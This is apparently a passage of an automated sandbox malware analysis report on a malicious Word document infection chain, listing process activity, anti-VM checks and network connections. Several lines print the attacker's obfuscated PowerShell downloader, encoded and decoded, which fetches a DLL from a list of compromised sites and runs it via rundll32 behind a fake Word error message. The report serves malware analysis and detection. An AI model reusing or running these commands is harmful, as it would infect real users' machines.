                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2368Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: rundll32.exe, 00000008.00000002.2095025221.000000000048D000.00000004.00000020.sdmpBinary or memory string: VMware_S
                      Source: powershell.exe, 00000005.00000002.2089981727.0000000000434000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00403278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002327EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00873278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002227EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002027EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003727EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002327EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 190.55.186.229 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACs